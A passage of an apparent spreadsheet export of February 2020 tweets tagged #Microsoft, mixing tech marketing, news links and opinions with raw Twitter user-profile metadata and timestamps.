    <t>{'id': 834299152997765128, 'id_str': '834299152997765128', 'name': 'OÄŸuzhan Ã‡Ä±tlak', 'screen_name': 'oguzhancitlak', 'location': 'Ankara, TÃ¼rkiye', 'description': 'IT Specialist, B. Sc. METU, M. Sc., PhD candidate in Computer Engineering at Gazi University. Interesting in CEH, CCNA, Penetration Testing and Social Networks.', 'url': 'https://t.co/NJHOp1uPNs', 'entities': {'url': {'urls': [{'url': 'https://t.co/NJHOp1uPNs', 'expanded_url': 'http://www.oguzhancitlak.com.tr', 'display_url': 'oguzhancitlak.com.tr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 189, 'listed_count': 0, 'created_at': 'Wed Feb 22 07:09:53 +0000 2017', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 106,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'http://pbs.twimg.com/profile_images/834299827882229760/GzIX5KBQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/834299827882229760/GzIX5KBQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/834299152997765128/1491650063',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</si>
  <si>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11:38:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft love and hate at the same time.
#hiperv suck</t>
  </si>
  <si>
    <t>{'id': 915944259148288000, 'id_str': '915944259148288000', 'name': 'Damian Fujiwara', 'screen_name': 'Damian_DCREV', 'location': 'Japan', 'description': 'ðŸ”¥ðŸ‘ŒðŸ‘ŒðŸ‘ŒðŸ‘ŒðŸ‘ŒBOIIIIðŸ‘ŒðŸ‘ŒðŸ‘ŒðŸ‘ŒðŸ‘ŒðŸ”¥', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Thu Oct 05 14:18:23 +0000 2017', 'favourites_count': 29,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'http://pbs.twimg.com/profile_images/1177173301787025410/IzzMDy4F_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177173301787025410/IzzMDy4F_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/915944259148288000/1569498919',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</si>
  <si>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11:33:54 +0000 2020</t>
  </si>
  <si>
    <t>US Tech Giants join China Shutdown over Corona Virus...
 https://t.co/UyAk1BBiCq #Coronavirus #Google #Microsoft #Tech https://t.co/P6vZsFdNh7</t>
  </si>
  <si>
    <t>{'id': 3240160352, 'id_str': '3240160352', 'name': 'IoEBusinessâ„¢', 'screen_name': 'IoENews', 'location': 'USA', 'description': 'Business Technology News: #AI #AWS #IoT #IoE #Fintech #Bitcoin #Blockchain #Cloud #Mobile #CyberSecurity #Social #Startups #Gaming #Gadgets #Reviews', 'url': 'https://t.co/WVNUrvF9k5', 'entities': {'url': {'urls': [{'url': 'https://t.co/WVNUrvF9k5', 'expanded_url': 'http://IoEBusiness.com', 'display_url': 'IoEBusiness.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5716, 'friends_count': 335, 'listed_count': 101, 'created_at': 'Mon Jun 08 18:52:57 +0000 2015', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2087,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'http://pbs.twimg.com/profile_images/1096466741180301314/_oik399H_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096466741180301314/_oik399H_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3240160352/1562352064', 'profile_link_color': '0164A1',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</si>
  <si>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11:32:38 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact OPTANE SYSTEMS for access to #Microsoft #Office365 advanced threat protection. https://t.co/ouXA4iR0mm</t>
  </si>
  <si>
    <t>Wed Feb 26 11:32:13 +0000 2020</t>
  </si>
  <si>
    <t>If you value your data, you want the highest performing data platform on the market. #1 in price and performance with massive scale, #Microsoft @SQLServer 2017 is the ultimate data platform. https://t.co/2OI8CsVTJL</t>
  </si>
  <si>
    <t>Wed Feb 26 11:32:00 +0000 2020</t>
  </si>
  <si>
    <t>Q: Is #Microsoft #Bing pay-per-click advertising cheaper than #Google #Ads? A: https://t.co/tKwn7saZVD #PPC #advertising https://t.co/ty2syyQv0n</t>
  </si>
  <si>
    <t>Wed Feb 26 11:31:22 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft Puget Sound campus consists of 120 buildings and 15 million square feet of office space. Operating that much infrastructure is a huge undertaking and requires serious IT solutions. How are you managing your operations? https://t.co/s01tp3b33X</t>
  </si>
  <si>
    <t>{'id': 125718660, 'id_str': '125718660', 'name': 'NCS.IT', 'screen_name': 'ncssupport', 'location': 'Rossendale, Lancashire', 'description': 'We are an IT company dealing with businesses. Founded in 1994, and now marking over 10 years as a Microsoft Gold Partner. \n\nðŸ“ž01706 239000\n\nðŸ’»info@ncs-support.com', 'url': 'http://t.co/N2HoVY06hZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/N2HoVY06hZ', 'expanded_url': 'http://www.ncs-support.com', 'display_url': 'ncs-support.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1432, 'friends_count': 1712, 'listed_count': 82, 'created_at': 'Tue Mar 23 17:03:06 +0000 2010', 'favourites_count': 498, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13070,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'http://pbs.twimg.com/profile_images/1143876240375472129/EkQxhc1t_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143876240375472129/EkQxhc1t_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/125718660/1580831765', 'profile_link_color': '9266CC',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</si>
  <si>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Wed Feb 26 11:30:28 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 11:30:17 +0000 2020</t>
  </si>
  <si>
    <t>The latest acquisition of Cornerstone Technology will help #GoogleCloud compete with cloud leaders #Amazon and #Microsoft. https://t.co/BnVXqIZd1W</t>
  </si>
  <si>
    <t>{'id': 1026457611632144385, 'id_str': '1026457611632144385', 'name': 'The HR Empire', 'screen_name': 'thehrempire', 'location': 'United States', 'description': 'The HR Empire empowers HR management by providing the latest news and updates to constantly grow your library of HR Resources. #HRTech #HR #PeopleAnalytics', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4683, 'friends_count': 3557, 'listed_count': 14, 'created_at': 'Mon Aug 06 13:19:00 +0000 2018', 'favourites_count': 2611, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2461,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'http://pbs.twimg.com/profile_images/1026758106502508545/cuw6t-nc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026758106502508545/cuw6t-nc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1026457611632144385/1536559772',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</si>
  <si>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11:30:12 +0000 2020</t>
  </si>
  <si>
    <t>With more and more companies optimising, automating and innovating their processes, systems and staff isn't it time you did too?
https://t.co/nWNoYZGhPN 
#powerplatform #power #technology #microsoft #microsoftpartner #digital #business #cloud https://t.co/KSxNCPNSqH</t>
  </si>
  <si>
    <t>Wed Feb 26 11:30:09 +0000 2020</t>
  </si>
  <si>
    <t>From the Blog: PacktLib yearly subscription for just 100$!!! @PacktPub https://t.co/icEvBBffFn #Microsoft #Azure #AzureFamily #Blog</t>
  </si>
  <si>
    <t>Wed Feb 26 11:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Is #technology subsuming #marketing? 
=&amp;gt; https://t.co/mrSLVA8jZG via @HarvardBiz 
#Google #Facebook #Microsoft #Amazon https://t.co/Y6YZKHCY4G</t>
  </si>
  <si>
    <t>{'id': 2158948440, 'id_str': '2158948440', 'name': 'Marina Tsiatoura', 'screen_name': 'mtsiatoura', 'location': 'Brussels', 'description': 'Sr #DigitalMarketing #CX Specialist working for various clients. Passionate about tech #innovations that empower communities - ex @Microsoft @Oracle @IBM', 'url': 'http://t.co/SNJQwMHPjb', 'entities': {'url': {'urls': [{'url': 'http://t.co/SNJQwMHPjb', 'expanded_url': 'http://linkedin.com/in/mtsiatoura/', 'display_url': 'linkedin.com/in/mtsiatoura/', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 756, 'friends_count': 669, 'listed_count': 15, 'created_at': 'Sun Oct 27 14:07:35 +0000 2013', 'favourites_count': 840, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 787,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'http://pbs.twimg.com/profile_images/378800000825377197/99c209c0efadeef14ab001e1968c9ad8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000825377197/99c209c0efadeef14ab001e1968c9ad8_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2158948440/1484055974',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</si>
  <si>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A leading manufacturer automated business processes and reduced human interaction using the #Microsoft #BizTalk server. Read more. https://t.co/xPSb4oPocb
#successstory https://t.co/ZdSqwbrMz9</t>
  </si>
  <si>
    <t>{'id': 18331975, 'id_str': '18331975', 'name': 'YASH Technologies', 'screen_name': 'YASH_Tech', 'location': 'East Moline, USA', 'description': 'YASH Technologies is a global #technology services and #outsourcing provider. Follow us at https://t.co/te3P3YytqN', 'url': 'http://t.co/0jgCssPi8S', 'entities': {'url': {'urls': [{'url': 'http://t.co/0jgCssPi8S', 'expanded_url': 'http://www.yash.com/', 'display_url': 'yash.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/te3P3YytqN', 'expanded_url': 'https://www.linkedin.com/company/yash-technologies/', 'display_url': 'linkedin.com/company/yash-tâ€¦', 'indices': [91, 114]}]}}, 'protected': False, 'followers_count': 2533, 'friends_count': 2386, 'listed_count': 109, 'created_at': 'Tue Dec 23 12:23:00 +0000 2008', 'favourites_count': 2235, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8664, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '467CAF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/994570895850065921/4Uge8KkK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/994570895850065921/4Uge8KkK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18331975/1583409543', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'E77844', 'profile_text_color': '00478C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 11:28:34 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/6qS9E3ZEph
Finally Microsoft are getting rid of live tiles!
PC's are meant to be a desktop environment, not a mobile or tablet environment.
Hopefully its not replaced by more adverts and bloatware... 
#TechNews 
#Windows10 
#Microsoft 
#Windows</t>
  </si>
  <si>
    <t>{'id': 174021312, 'id_str': '174021312', 'name': 'Tech Support Group', 'screen_name': 'techsg', 'location': 'Westminster, London, UK', 'description': 'IT Support Company based in Westminster, London.\nhttps://t.co/oKXufvl0Oj', 'url': 'http://t.co/95ZmMz7zDU', 'entities': {'url': {'urls': [{'url': 'http://t.co/95ZmMz7zDU', 'expanded_url': 'http://www.techsupportgroup.co.uk', 'display_url': 'techsupportgroup.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/oKXufvl0Oj', 'expanded_url': 'https://www.facebook.com/techsupportgroup/', 'display_url': 'facebook.com/techsupportgroâ€¦', 'indices': [49, 72]}]}}, 'protected': False, 'followers_count': 235, 'friends_count': 255, 'listed_count': 5, 'created_at': 'Mon Aug 02 22:50:28 +0000 2010', 'favourites_count': 281, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 534,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'http://pbs.twimg.com/profile_images/378800000039595491/a57977af4797b791f7d6cd835605a4bb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000039595491/a57977af4797b791f7d6cd835605a4bb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/174021312/1541777408',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</si>
  <si>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11:27:11 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 11:22:37 +0000 2020</t>
  </si>
  <si>
    <t>Another #phishing attack on the way: if you receive an email simulating a request from #Microsoft Microsoft to Upgrade your account, probably is trying to steal your email and password. In case of doubt, just call to your IT partner to avoid problems @arcustech https://t.co/oL2Vr748Uq</t>
  </si>
  <si>
    <t>{'id': 884714378641244160, 'id_str': '884714378641244160', 'name': 'David Rivas Huete', 'screen_name': 'IcemanRivas', 'location': 'Sheffield', 'description': '#Security and #Intelligence hi-tech based specialist, providing solutions to public and private sectors in the UK.\ndavid.rivas@arcustechnology.co.uk', 'url': 'https://t.co/wf0mmgY72c', 'entities': {'url': {'urls': [{'url': 'https://t.co/wf0mmgY72c', 'expanded_url': 'https://www.davidrivashuete.com', 'display_url': 'davidrivashuete.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 150, 'listed_count': 2, 'created_at': 'Tue Jul 11 10:01:59 +0000 2017', 'favourites_count': 676, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 656, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/902925838760505344/HibXrnsj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/902925838760505344/HibXrnsj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/884714378641244160/1583161682',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</si>
  <si>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11:21:30 +0000 2020</t>
  </si>
  <si>
    <t>For Satya, coding is like a poetry which can empower history to sciences and a 13 year old from Ludhiana shows him exactly that
@satyanadella
@MicrosoftIndia
@ians_india
#Microsoft
https://t.co/v50igfzFIx</t>
  </si>
  <si>
    <t>Wed Feb 26 11:16:36 +0000 2020</t>
  </si>
  <si>
    <t>Am I the only one who gets annoyed that you cant have firstname/lastname @ your email provider because its always taken then settle for something like lastname first initial &amp;amp; some numbers on the end? #yahoo #email #google #gmail #microsoft #outlook #annoying #WednesdayThoughts</t>
  </si>
  <si>
    <t>Wed Feb 26 11:15:11 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 11:11:48 +0000 2020</t>
  </si>
  <si>
    <t>Azure Concepts
Thank you #TreyHatch, @mourngrymtc and @linuxacademyCOM for this course.
#microsoft #azure #cloud https://t.co/RIPnM8xp6T</t>
  </si>
  <si>
    <t>{'id': 3089361313, 'id_str': '3089361313', 'name': 'Unni P', 'screen_name': 'iamunnip', 'location': '127.0.0.1', 'description': 'DevSecOps Enthusiast | Linux | Docker | Kubernetes | Vagrant | Git | VMware | AWS | Nagios | Windows', 'url': 'https://t.co/CzTewNSzPX', 'entities': {'url': {'urls': [{'url': 'https://t.co/CzTewNSzPX', 'expanded_url': 'http://linkedin.com/in/iamunnip', 'display_url': 'linkedin.com/in/iamunnip', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1233, 'friends_count': 3900, 'listed_count': 286, 'created_at': 'Mon Mar 16 12:29:14 +0000 2015', 'favourites_count': 45534, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25958,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'http://pbs.twimg.com/profile_images/780017415140761602/FGK-0LFm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/780017415140761602/FGK-0LFm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3089361313/1522583387', 'profile_link_color': 'D50000',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</si>
  <si>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Wed Feb 26 11:09:59 +0000 2020</t>
  </si>
  <si>
    <t>At IT Lab, its our job  and our passion  to keep pace with IT. One way we do this is through our close partnership with Microsoft. Enjoy our list of the best #Microsoft   accounts for IT insights. #kudos to @Microsoft365 @windowsblog @MSIntune 
https://t.co/I2wYmNR4n4</t>
  </si>
  <si>
    <t>Wed Feb 26 11:06:39 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has a long and entertaining history of hiding #easter eggs, secret #games and other oddities in its #operatingsystems. Who can forget Hall of Tortured Souls in Microsoft Office in Windows 95, or Pinball in Word 97? #Windows10 #Windows
https://t.co/Lc38BtjTLv https://t.co/eW0O4RZtYY</t>
  </si>
  <si>
    <t>Wed Feb 26 11:06:02 +0000 2020</t>
  </si>
  <si>
    <t>We Measure Our Success by Economic Impact, not MCap
AI is ultimately a tool. How the tool gets used is something every country and every society has to decide
#AI #ArtificialIntelligence #SatyaNadella #Microsoft #CEO 
From The Economic Times:  https://t.co/BDPYXVeN1P</t>
  </si>
  <si>
    <t>{'id': 1126097739853393922, 'id_str': '1126097739853393922', 'name': 'STARTIAL', 'screen_name': '_STARTIAL', 'location': '', 'description': 'IT COMPANY', 'url': 'https://t.co/2zsNyblSXJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/2zsNyblSXJ', 'expanded_url': 'http://www.startial.com', 'display_url': 'startial.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 95, 'listed_count': 0, 'created_at': 'Wed May 08 12:13:17 +0000 2019', 'favourites_count': 930, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 920,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'http://pbs.twimg.com/profile_images/1126103324091019265/6yaURw0m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126103324091019265/6yaURw0m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126097739853393922/1557320222',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</si>
  <si>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11:06:00 +0000 2020</t>
  </si>
  <si>
    <t>" #Microsoft patches serious security flaws in #Azure " | @TechRadarPro https://t.co/nBbAKficOm</t>
  </si>
  <si>
    <t>{'id': 1039551824129347585, 'id_str': '1039551824129347585', 'name': 'Empirical Data Strategies', 'screen_name': 'Data_4_People', 'location': 'Birmingham, AL', 'description': 'We provide #projectmanagement and #datascience solutions to small and growing businesses.', 'url': 'https://t.co/D7AqsuNErS', 'entities': {'url': {'urls': [{'url': 'https://t.co/D7AqsuNErS', 'expanded_url': 'http://www.empiricaldata.org', 'display_url': 'empiricaldata.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 906, 'listed_count': 0, 'created_at': 'Tue Sep 11 16:30:43 +0000 2018', 'favourites_count': 305, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1104, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1040422465506295808/4j5vdpz0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1040422465506295808/4j5vdpz0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1039551824129347585/1536890707',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</si>
  <si>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11:04:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft proxy #Accenture = lies and failures guaranteed  https://t.co/DIDVBd1bQK  hopefully this too will fail. #WarOnCash #WarOnAnonymity</t>
  </si>
  <si>
    <t>Wed Feb 26 11:04:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Bringing Defender Antivirus to #IOS &amp;amp; #Android in 2020 #Business #Microsoftenterprise https://t.co/wOhH8kTDhY https://t.co/aEDeWTFYUA</t>
  </si>
  <si>
    <t>{'id': 3278818388, 'id_str': '3278818388', 'name': 'App Informers', 'screen_name': 'AppInformers', 'location': 'Minneapolis, MN', 'description': 'App Informers is the premier news source for the mobile app universe.', 'url': 'http://t.co/Lc6cG8YWgw', 'entities': {'url': {'urls': [{'url': 'http://t.co/Lc6cG8YWgw', 'expanded_url': 'http://appinformers.com', 'display_url': 'appinformers.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 577, 'friends_count': 33, 'listed_count': 24, 'created_at': 'Mon Jul 13 18:59:10 +0000 2015', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2422,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'http://pbs.twimg.com/profile_images/633685733044129792/wod4UEUl_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/633685733044129792/wod4UEUl_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3278818388/1442866893',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</si>
  <si>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11:04:01 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/psvLZGB4q5</t>
  </si>
  <si>
    <t>Wed Feb 26 11:03:12 +0000 2020</t>
  </si>
  <si>
    <t>Happy Hexagonal Day! @BillGates Bill Gates is 23,497 days old today which is a Hexagonal number. https://t.co/TESKuCsBKX #microsoft Retweet</t>
  </si>
  <si>
    <t>{'id': 3309234509, 'id_str': '3309234509', 'name': 'Every Day Counts', 'screen_name': 'every1000days', 'location': 'Everywhere', 'description': "When birthdays aren't enough", 'url': 'https://t.co/drfKx4iPYD', 'entities': {'url': {'urls': [{'url': 'https://t.co/drfKx4iPYD', 'expanded_url': 'http://every1000.com', 'display_url': 'every1000.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 268, 'friends_count': 2, 'listed_count': 6, 'created_at': 'Fri Jun 05 12:56:47 +0000 2015', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7558,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'http://pbs.twimg.com/profile_images/735062330229305348/7jOUUFQh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/735062330229305348/7jOUUFQh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3309234509/1464088599',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</si>
  <si>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Wed Feb 26 11:02:50 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. https://t.co/XmZCUHZtFH</t>
  </si>
  <si>
    <t>{'id': 145761427, 'id_str': '145761427', 'name': 'Ernest-Jan Mutsaers', 'screen_name': 'EJMutsaers', 'location': 'Hilversum\n', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 34, 'listed_count': 4, 'created_at': 'Wed May 19 20:26:12 +0000 2010', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 529,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'http://pbs.twimg.com/profile_images/1220040852/EJTwit_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220040852/EJTwit_normal.jpg',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</si>
  <si>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11:01:23 +0000 2020</t>
  </si>
  <si>
    <t>Secure and seamless business continuity is possible! Nakilat improved efficiency and cut operating costs in half with #Microsoft SaaS solutions. Contact MISA Business Solutions e.U. to learn how you can too. https://t.co/ZmAjWh0aqi</t>
  </si>
  <si>
    <t>Wed Feb 26 11:00:35 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's Bluetooth mouse hits an all-time low of $15 Prime shipped - 9to5Toys https://t.co/Tw4ywHeQ42
#mouse #Bluetoothmouse #Microsoft  #bestmouse #bestBluetoothmouse https://t.co/vyWKaUUurm</t>
  </si>
  <si>
    <t>{'id': 92105484, 'id_str': '92105484', 'name': 'Esource Parts', 'screen_name': 'Esourceparts', 'location': 'Mississauga Ontario', 'description': '401 Traders Blvd East Unit 9,Mississauga.Monday - Friday: 10am to 6pm, Saturday: 10am to 4pm #IPHONE,#SAMSUNG AND #BLACKBERRY PARTS ! WE  DO #REPAIRS!', 'url': 'http://t.co/ZqzVnkaWw5', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZqzVnkaWw5', 'expanded_url': 'http://www.esourceparts.ca', 'display_url': 'esourceparts.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3627, 'friends_count': 3987, 'listed_count': 8, 'created_at': 'Mon Nov 23 20:27:13 +0000 2009', 'favourites_count': 891, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1901, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4D0A0A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/904382508002795520/ueX7X--U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/904382508002795520/ueX7X--U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/92105484/1503428624', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '97A7AD', 'profile_text_color': '781313', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 11:00:31 +0000 2020</t>
  </si>
  <si>
    <t>What does the future hold for your agency? Join us at our office in Farnborough on 12th March to discover how you can use AI to win new projects through growth and innovation https://t.co/Itn2QvCopt #microsoft #digitalagencies #ai https://t.co/kDdSKjtZ3p</t>
  </si>
  <si>
    <t>Wed Feb 26 11:00:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft uses its expertise in #malware to help with fileless attack detection on #Linux https://t.co/UrPzc8lFij #TheRegister</t>
  </si>
  <si>
    <t>Wed Feb 26 11:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has thousands of subdomains which can be hijacked and used for attacks against users, its employees, or for showing spammy content.
https://t.co/LzAy3YZVz4
#Cybersecurity #Microsoft #malware</t>
  </si>
  <si>
    <t>{'id': 1146455619534123009, 'id_str': '1146455619534123009', 'name': 'Jarod Lim', 'screen_name': 'jarod_lwk', 'location': 'Kuala Lumpur City', 'description': 'Husband. Son. Global Head of IT.', 'url': 'https://t.co/xV1hnzPghn', 'entities': {'url': {'urls': [{'url': 'https://t.co/xV1hnzPghn', 'expanded_url': 'https://www.linkedin.com/in/jarodlim/', 'display_url': 'linkedin.com/in/jarodlim/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 40, 'listed_count': 0, 'created_at': 'Wed Jul 03 16:28:14 +0000 2019', 'favourites_count': 46, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1217470141241278464/PxoyuDbA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217470141241278464/PxoyuDbA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1146455619534123009/1562222867',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</si>
  <si>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 use Microsoft Planner across all of the entrust IT Group offices. You can find out why and what makes it so great in our blog: https://t.co/dRxZyovV4F
#microsoft #planner #technology</t>
  </si>
  <si>
    <t>Wed Feb 26 10:59:48 +0000 2020</t>
  </si>
  <si>
    <t>With #LinkedIn Featured you can now more prominently show off what you and your company do and are all about.
#Featured #LinkedInFeatured #EnterpriseNetwork #ENNordic #company #Microsoft  
https://t.co/iuLlGhs6ob</t>
  </si>
  <si>
    <t>Wed Feb 26 10:59:24 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 10:56:40 +0000 2020</t>
  </si>
  <si>
    <t>#SpecialOffer! For a limited time, Cloud1's ultimate #Microsoft package comes with our fully managed #EndpointSecurity included #FREE https://t.co/Vbc6PGEsQt Package includes; #Microsoft365, Microsoft Business Voice &amp;amp; endpoint threat protection all for 36.49 per user, per month. https://t.co/GpRhH1I6OJ</t>
  </si>
  <si>
    <t>Wed Feb 26 10:55:06 +0000 2020</t>
  </si>
  <si>
    <t>#Google warnt vor #Microsoft-Browser #Edge https://t.co/7N5vwHjPtp via @zdnet_de</t>
  </si>
  <si>
    <t>{'id': 18898799, 'id_str': '18898799', 'name': 'PSW GROUP', 'screen_name': 'pswgroup', 'location': 'Fulda, Hessen, Germany', 'description': 'Ihre #IT-Sicherheit ist unser Ziel - vom #SSL-Zertifikat bis zur Beratung, Betreuung, PrÃ¼fung und Schulung von #ISO 27001 &amp; #ISIS12 sind wir Ihr Partner.', 'url': 'http://t.co/fWavgsseXN', 'entities': {'url': {'urls': [{'url': 'http://t.co/fWavgsseXN', 'expanded_url': 'http://www.psw.net/', 'display_url': 'psw.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 880, 'friends_count': 760, 'listed_count': 115, 'created_at': 'Mon Jan 12 12:03:28 +0000 2009', 'favourites_count': 383, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11002, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '00437A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 